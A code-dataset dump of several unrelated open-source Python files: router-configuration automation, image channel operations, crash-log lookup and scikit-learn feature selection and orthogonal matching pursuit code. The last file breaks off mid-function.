return 1
def GetSupportedBands(self):
return [{'band': self.band_2ghz,
'channels': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]},
{'band': self.band_5ghz,
'channels': [26, 40, 44, 48, 149, 153, 157, 161, 165]}]
def GetSupportedModes(self):
return [{'band': self.band_2ghz,
'modes': [self.mode_b, self.mode_g, self.mode_n,
self.mode_b | self.mode_g, self.mode_g | self.mode_n]},
{'band': self.band_5ghz,
'modes': [self.mode_a, self.mode_n, self.mode_a | self.mode_n]}]
def NavigateToPage(self, page_number):
# All settings are on the same page, so we always open the config page
self._OpenConfigurationPage()
return True
def SavePage(self, page_number):
# All settings are on the same page, we can ignore page_number
button = self._driver.find_element_by_xpath('//input[@name="apply"]')
button.click()
# If we did not make changes so we are sent to the continue screen.
continue_screen = True
button_xpath = '//input[@name="bt"]'
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(button_xpath))
except selenium.common.exceptions.TimeoutException, e:
continue_screen = False
if continue_screen:
button = self._driver.find_element_by_xpath(button_xpath)
button.click()
# We will be returned to the landing page when complete
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath('id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
return False
return True
def SetMode(self, mode, band=None):
# Mode overrides the band. So if a band change is made after a mode change
# it may make an incompatible pairing.
self.AddItemToCommandList(self._SetMode, (mode, band), 1, 800)
def _SetMode(self, mode, band=None):
# Create the mode to popup item mapping
mode_mapping = {self.mode_b: '802.11b Only', self.mode_g: '802.11g Only',
self.mode_n: '802.11n Only',
self.mode_b | self.mode_g: 'Mixed 802.11g and 802.11b',
self.mode_n | self.mode_g: 'Mixed 802.11n and 802.11g',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_a: '802.11a Only',
self.mode_n | self.mode_a: 'Mixed 802.11n and 802.11a'}
band_value = self.band_2ghz
if mode in mode_mapping.keys():
popup_value = mode_mapping[mode]
# If the mode contains 802.11a we use 5Ghz
if mode & self.mode_a == self.mode_a:
band_value = self.band_5ghz
# If the mode is 802.11n mixed with 802.11a it must be 5Ghz
elif mode & (self.mode_n | self.mode_a) == (self.mode_n | self.mode_a):
band_value = self.band_5ghz
# If the mode is 802.11n mixed with something other than 802.11a its 2Ghz
elif mode & self.mode_n == self.mode_n and mode ^ self.mode_n > 0:
band_value = self.band_2ghz
# If the mode is 802.11n then we default to 5Ghz unless there is a band
elif mode == self.mode_n:
band_value = self.band_5ghz
if band:
band_value = band
else:
logging.exception('The mode selected %d is not supported by router %s.',
hex(mode), self.getRouterName())
# Set the band first
self._SetBand(band_value)
popup_id = 'mode_80211_11g'
if band_value == self.band_5ghz:
popup_id = 'mode_80211_11a'
self.SelectItemFromPopupByID(popup_value, popup_id)
def SetRadio(self, enabled=True):
# If we are enabling we are activating all other UI components, do it first.
# Otherwise we are turning everything off so do it last.
if enabled:
weight = 1
else:
weight = 1000
# This disables all UI so it should be the last item to be changed
self.AddItemToCommandList(self._SetRadio, (enabled,), 1, weight)
def _SetRadio(self, enabled=True):
# The radio checkbox for this router always has a value of 1. So we need to
# use other methods to determine if the radio is on or not. Check if the
# ssid textfield is disabled.
ssid = self._driver.find_element_by_xpath('//input[@name="ssid"]')
if ssid.get_attribute('disabled') == 'true':
radio_enabled = False
else:
radio_enabled = True
if radio_enabled == enabled:
# Nothing to do
return
self.SetCheckBoxSelectedByID('enable', selected=False,
wait_for_xpath='id("security_type_ap")')
def SetSSID(self, ssid):
# Can be done as long as it is enabled
self.AddItemToCommandList(self._SetSSID, (ssid,), 1, 900)
def _SetSSID(self, ssid):
self._SetRadio(enabled=True)
self.SetContentOfTextFieldByID(ssid, 'ssid')
def SetChannel(self, channel):
self.AddItemToCommandList(self._SetChannel, (channel,), 1, 900)
def _SetChannel(self, channel):
self._SetRadio(enabled=True)
self.SetCheckBoxSelectedByID('autochann', selected=False)
self.SelectItemFromPopupByID(str(channel), 'channel_g')
# Experimental
def GetBand(self):
# The radio buttons do more than run a script that adjusts the possible
# channels. We will just check the channel to popup.
self.setRadioSetting(enabled=True)
xpath = ('id("channel_g")')
self._OpenConfigurationPage()
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
element = self._driver.find_element_by_xpath(xpath)
if element.find_elements_by_tag_name('option')[0].text == '1':
return self.band_2ghz
return self.band_5ghz
def SetBand(self, band):
if band != self.band_2GHz or band != self.band_5ghz:
self.fail(msg='Invalid band sent %s' % band)
self.AddItemToCommandList(self._SetBand, (band,), 1, 900)
def _SetBand(self, band):
self._SetRadio(enabled=True)
if band == self.band_2ghz:
int_value = 0
wait_for_xpath = 'id("mode_80211_11g")'
elif band == self.band_5ghz:
int_value = 1
wait_for_xpath = 'id("mode_80211_11a")'
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" and @name="band"]'
% int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(wait_for_xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('The appropriate mode popup could not be found after '
'adjusting the band. WebDriver exception: %s', str(e))
def SetSecurityDisabled(self):
self.AddItemToCommandList(self._SetSecurityDisabled, (), 1, 900)
def _SetSecurityDisabled(self):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_disabled, 'security_type_ap')
def SetSecurityWEP(self, key_value, authentication):
self.AddItemToCommandList(self._SetSecurityWEP, (key_value, authentication),
1, 900)
def _SetSecurityWEP(self, key_value, authentication):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wep, 'security_type_ap',
wait_for_xpath='id("auth_type")')
self.SelectItemFromPopupByID(authentication, 'auth_type',
wait_for_xpath='id("wep_key_value")')
self.SetContentOfTextFieldByID(key_value, 'wep_key_value')
self.SetContentOfTextFieldByID(key_value, 'verify_wep_key_value')
def SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self.AddItemToCommandList(self._SetSecurityWPAPSK,
(shared_key, update_interval), 1, 900)
def _SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wpapsk, 'security_type_ap',
wait_for_xpath='id("wpa_mode")')
self.SelectItemFromPopupByID('WPA Only', 'wpa_mode',
wait_for_xpath='id("grp_key_interval")')
self.SetContentOfTextFieldByID(str(update_interval), 'grp_key_interval')
self.SetContentOfTextFieldByID(shared_key, 'wpapsk1')
def SetVisibility(self, visible=True):
self.AddItemToCommandList(self._SetVisibility, (visible,), 1, 900)
def _SetVisibility(self, visible=True):
self._SetRadio(enabled=True)
# value=0 is visible; value=1 is invisible
int_value = 0
if not visible:
int_value = 1
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" '
'and @name="visibility_status"]' % int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
| bsd-3-clause | -776,347,489,381,774,500 | 40.618557 | 80 | 0.63785 | false |
RachitKansal/scikit-learn | examples/feature_selection/plot_rfe_with_cross_validation.py | 226 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
n_redundant=2, n_repeated=0, n_classes=8,
n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
| bsd-3-clause | 6,433,790,137,123,866,000 | 36.405405 | 74 | 0.679191 | false |
ambujone/breath-hackathon | gae/lib/PIL/ImageChops.py | 40 | 7411 | #
# The Python Imaging Library.
# $Id$
#
# standard channel operations
#
# History:
# 1996-03-24 fl Created
# 1996-08-13 fl Added logical operations (for "1" images)
# 2000-10-12 fl Added offset method (from Image.py)
#
# Copyright (c) 1997-2000 by Secret Labs AB
# Copyright (c) 1996-2000 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image
##
# The <b>ImageChops</b> module contains a number of arithmetical image
# operations, called <i>channel operations</i> ("chops"). These can be
# used for various purposes, including special effects, image
# compositions, algorithmic painting, and more.
# <p>
# At this time, channel operations are only implemented for 8-bit
# images (e.g. "L" and "RGB").
# <p>
# Most channel operations take one or two image arguments and returns
# a new image. Unless otherwise noted, the result of a channel
# operation is always clipped to the range 0 to MAX (which is 255 for
# all modes supported by the operations in this module).
##
##
# Return an image with the same size as the given image, but filled
# with the given pixel value.
#
# @param image Reference image.
# @param value Pixel value.
# @return An image object.
def constant(image, value):
"Fill a channel with a given grey level"
return Image.new("L", image.size, value)
##
# Copy image.
#
# @param image Source image.
# @return A copy of the source image.
def duplicate(image):
"Create a copy of a channel"
return image.copy()
##
# Inverts an image
# (MAX - image).
#
# @param image Source image.
# @return An image object.
def invert(image):
"Invert a channel"
image.load()
return image._new(image.im.chop_invert())
##
# Compare images, and return lighter pixel value
# (max(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the lighter values.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def lighter(image1, image2):
"Select the lighter pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_lighter(image2.im))
##
# Compare images, and return darker pixel value
# (min(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the darker values.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def darker(image1, image2):
"Select the darker pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_darker(image2.im))
##
# Calculate absolute difference
# (abs(image1 - image2)).
# <p>
# Returns the absolute value of the difference between the two images.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def difference(image1, image2):
"Subtract one image from another"
image1.load()
image2.load()
return image1._new(image1.im.chop_difference(image2.im))
##
# Superimpose positive images
# (image1 * image2 / MAX).
# <p>
# Superimposes two images on top of each other. If you multiply an
# image with a solid black image, the result is black. If you multiply
# with a solid white image, the image is unaffected.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def multiply(image1, image2):
"Superimpose two positive images"
image1.load()
image2.load()
return image1._new(image1.im.chop_multiply(image2.im))
##
# Superimpose negative images
# (MAX - ((MAX - image1) * (MAX - image2) / MAX)).
# <p>
# Superimposes two inverted images on top of each other.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def screen(image1, image2):
"Superimpose two negative images"
image1.load()
image2.load()
return image1._new(image1.im.chop_screen(image2.im))
##
# Add images
# ((image1 + image2) / scale + offset).
# <p>
# Adds two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def add(image1, image2, scale=1.0, offset=0):
"Add two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_add(image2.im, scale, offset))
##
# Subtract images
# ((image1 - image2) / scale + offset).
# <p>
# Subtracts two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def subtract(image1, image2, scale=1.0, offset=0):
"Subtract two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract(image2.im, scale, offset))
##
# Add images without clipping
# ((image1 + image2) % MAX).
# <p>
# Adds two images, without clipping the result.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def add_modulo(image1, image2):
"Add two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_add_modulo(image2.im))
##
# Subtract images without clipping
# ((image1 - image2) % MAX).
# <p>
# Subtracts two images, without clipping the result.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def subtract_modulo(image1, image2):
"Subtract two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract_modulo(image2.im))
##
# Logical AND
# (image1 and image2).
def logical_and(image1, image2):
"Logical and between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_and(image2.im))
##
# Logical OR
# (image1 or image2).
def logical_or(image1, image2):
"Logical or between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_or(image2.im))
##
# Logical XOR
# (image1 xor image2).
def logical_xor(image1, image2):
"Logical xor between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_xor(image2.im))
##
# Blend images using constant transparency weight.
# <p>
# Same as the <b>blend</b> function in the <b>Image</b> module.
def blend(image1, image2, alpha):
"Blend two images using a constant transparency weight"
return Image.blend(image1, image2, alpha)
##
# Create composite using transparency mask.
# <p>
# Same as the <b>composite</b> function in the <b>Image</b> module.
def composite(image1, image2, mask):
"Create composite image by blending images using a transparency mask"
return Image.composite(image1, image2, mask)
##
# Offset image data.
# <p>
# Returns a copy of the image where data has been offset by the given
# distances. Data wraps around the edges. If yoffset is omitted, it
# is assumed to be equal to xoffset.
#
# @param image Source image.
# @param xoffset The horizontal distance.
# @param yoffset The vertical distance. If omitted, both
# distances are set to the same value.
# @return An Image object.
def offset(image, xoffset, yoffset=None):
"Offset image in horizontal and/or vertical direction"
if yoffset is None:
yoffset = xoffset
image.load()
return image._new(image.im.offset(xoffset, yoffset))
| mit | 7,220,353,483,006,293,000 | 23.539735 | 73 | 0.695588 | false |
rcbau/hacks | gerrit/utility.py | 1 | 1291 | #!/usr/bin/python
import decimal
import types
import unicodedata
import urllib
def DisplayFriendlySize(bytes):
"""DisplayFriendlySize -- turn a number of bytes into a nice string"""
t = type(bytes)
if t != types.LongType and t != types.IntType and t != decimal.Decimal:
return 'NotANumber(%s=%s)' %(t, bytes)
if bytes < 1024:
return '%d bytes' % bytes
if bytes < 1024 * 1024:
return '%d kb (%d bytes)' %((bytes / 1024), bytes)
if bytes < 1024 * 1024 * 1024:
return '%d mb (%d bytes)' %((bytes / (1024 * 1024)), bytes)
return '%d gb (%d bytes)' %((bytes / (1024 * 1024 * 1024)), bytes)
def Normalize(value):
normalized = unicodedata.normalize('NFKD', unicode(value))
normalized = normalized.encode('ascii', 'ignore')
return normalized
def read_remote_lines(url):
remote = urllib.urlopen(url)
data = ''
while True:
d = remote.read(100)
if not d:
break
data += d
if data.find('\n') != -1:
elems = data.split('\n')
for line in elems[:-1]:
yield line
data = elems[-1]
if data:
yield data
def read_remote_file(url):
data = []
for line in read_remote_lines(url):
data.append(line)
return '\n'.join(data)
| apache-2.0 | -2,032,916,939,893,834,500 | 20.881356 | 73 | 0.578621 | false |
digitalLumberjack/recalbox-configgen | runtest/case.py | 2 | 2950 | '''
Created on Mar 6, 2016
@author: Laurent Marchelli
'''
import os
import sys
import shutil
import unittest
from . import dir_res, dir_tmp
class TestCase(unittest.TestCase):
args_dict = {}
@classmethod
def setUpClass(cls, system, emulator):
# Define test system configuration path
cls.path_init = os.path.join(dir_res, emulator)
cls.path_user = os.path.join(dir_tmp, emulator)
# Define test needed objects
lst_args = [
"p1index", "p1guid", "p1name", "p1devicepath",
"p2index", "p2guid", "p2name", "p2devicepath",
"p3index", "p3guid", "p3name", "p3devicepath",
"p4index", "p4guid", "p4name", "p4devicepath",
"p5index", "p5guid", "p5name", "p5devicepath",
"system", "rom", "emulator", "core", "demo",
]
lst_values = [None] * len(lst_args)
cls.args_dict = dict(zip(lst_args, lst_values))
cls.args_dict['system'] = system
cls.args_dict['emulator'] = emulator
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# Cleanup previous test temporary files
if os.path.exists(self.path_user):
shutil.rmtree(self.path_user)
# Create test environment
os.makedirs(self.path_user)
# Copy class args into instance args to avoid corruption by
# test instances.
self.args = self.__class__.args_dict.copy()
def tearDown(self):
pass
def __init__(self, methodName='runTest', params=None, results=None, msg=None):
super(TestCase, self).__init__(methodName)
self.params = params
self.results = results
self.message = msg
def __str__(self):
msg = '' if self.message is None else '({})'.format(self.message)
return "{}.{}{}".format(self.__class__.__name__,
self._testMethodName, msg)
def assertDictContentEqual(self, d1, d2, msg=None):
self.assertListEqual(sorted(d1.items()),
sorted(d2.items()))
# Thanks to Rob Cowie (http://stackoverflow.com/users/46690/rob-cowie)
# From : http://stackoverflow.com/posts/6796752/revisions
class RedirectStdStreams(object):
def __init__(self, stdout=None, stderr=None):
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
self.old_stdout.flush(); self.old_stderr.flush()
sys.stdout, sys.stderr = self._stdout, self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush(); self._stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | mit | 4,547,261,743,869,433,000 | 31.428571 | 82 | 0.58678 | false |
lombritz/odoo | addons/product_margin/__init__.py | 444 | 1092 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,188,084,370,870,802,400 | 41 | 79 | 0.613553 | false |
gitromand/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/crashlogs.py | 117 | 5490 | # Copyright (c) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import codecs
import re
class CrashLogs(object):
PID_LINE_REGEX = re.compile(r'\s+Global\s+PID:\s+\[(?P<pid>\d+)\]')
def __init__(self, host, results_directory=None):
self._host = host
self._results_directory = results_directory
def find_newest_log(self, process_name, pid=None, include_errors=False, newer_than=None):
if self._host.platform.is_mac():
return self._find_newest_log_darwin(process_name, pid, include_errors, newer_than)
elif self._host.platform.is_win():
return self._find_newest_log_win(process_name, pid, include_errors, newer_than)
return None
def _log_directory_darwin(self):
log_directory = self._host.filesystem.expanduser("~")
log_directory = self._host.filesystem.join(log_directory, "Library", "Logs")
if self._host.filesystem.exists(self._host.filesystem.join(log_directory, "DiagnosticReports")):
log_directory = self._host.filesystem.join(log_directory, "DiagnosticReports")
else:
log_directory = self._host.filesystem.join(log_directory, "CrashReporter")
return log_directory
def _find_newest_log_darwin(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith(process_name + "_") and basename.endswith(".crash")
log_directory = self._log_directory_darwin()
logs = self._host.filesystem.files_under(log_directory, file_filter=is_crash_log)
first_line_regex = re.compile(r'^Process:\s+(?P<process_name>.*) \[(?P<pid>\d+)\]$')
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
f = self._host.filesystem.read_text_file(path)
match = first_line_regex.match(f[0:f.find('\n')])
if match and match.group('process_name') == process_name and (pid is None or int(match.group('pid')) == pid):
return errors + f
except IOError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
def _find_newest_log_win(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith("CrashLog")
logs = self._host.filesystem.files_under(self._results_directory, file_filter=is_crash_log)
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
log_file = self._host.filesystem.read_binary_file(path).decode('utf8', 'ignore')
match = self.PID_LINE_REGEX.search(log_file)
if match is None:
continue
if int(match.group('pid')) == pid:
return errors + log_file
except IOError, e:
print "IOError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
print "OSError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except UnicodeDecodeError, e:
print "UnicodeDecodeError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to decode '%s' as utf8: %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
| bsd-3-clause | -6,988,606,583,348,061,000 | 47.584071 | 129 | 0.622951 | false |
tawsifkhan/scikit-learn | sklearn/linear_model/omp.py | 127 | 30417 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import as_float_array, check_array, check_X_y
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
import scipy
solve_triangular_args = {}
if LooseVersion(scipy.__version__) >= LooseVersion('0.12'):
# check_finite=False is an optimization available only in scipy >=0.12
solve_triangular_args = {'check_finite': False}
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
return_path=False):
"""Orthogonal Matching Pursuit step using the Cholesky decomposition.
Parameters
----------
X : array, shape (n_samples, n_features)
Input dictionary. Columns are assumed to have unit norm.
y : array, shape (n_samples,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coef : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
if copy_X:
X = X.copy('F')
else: # even if we are allowed to overwrite, still copy it if bad order
X = np.asfortranarray(X)
min_float = np.finfo(X.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
potrs, = get_lapack_funcs(('potrs',), (X,))
alpha = np.dot(X.T, y)
residual = y
gamma = np.empty(0)
n_active = 0
indices = np.arange(X.shape[1]) # keeping track of swapping
max_features = X.shape[1] if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=X.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=X.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(np.dot(X.T, residual)))
if lam < n_active or alpha[lam] ** 2 < min_float:
# atom already selected or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
# Updates the Cholesky decomposition of X' X
L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
indices[n_active], indices[lam] = indices[lam], indices[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
residual = y - np.dot(X[:, :n_active], gamma)
if tol is not None and nrm2(residual) ** 2 <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
copy_Gram=True, copy_Xy=True, return_path=False):
"""Orthogonal Matching Pursuit step on a precomputed Gram matrix.
This function uses the the Cholesky decomposition method.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data matrix
Xy : array, shape (n_features,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol_0 : float
Squared norm of y, required if tol is not None.
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coefs : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
if copy_Xy:
Xy = Xy.copy()
min_float = np.finfo(Gram.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
potrs, = get_lapack_funcs(('potrs',), (Gram,))
indices = np.arange(len(Gram)) # keeping track of swapping
alpha = Xy
tol_curr = tol_0
delta = 0
gamma = np.empty(0)
n_active = 0
max_features = len(Gram) if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=Gram.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=Gram.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(alpha))
if lam < n_active or alpha[lam] ** 2 < min_float:
# selected same atom twice, or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
if n_active > 0:
L[n_active, :n_active] = Gram[lam, :n_active]
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
L[n_active, n_active] = np.sqrt(1 - v)
Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
indices[n_active], indices[lam] = indices[lam], indices[n_active]
Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
beta = np.dot(Gram[:, :n_active], gamma)
alpha = Xy - beta
if tol is not None:
tol_curr += delta
delta = np.inner(gamma, beta[:n_active])
tol_curr -= delta
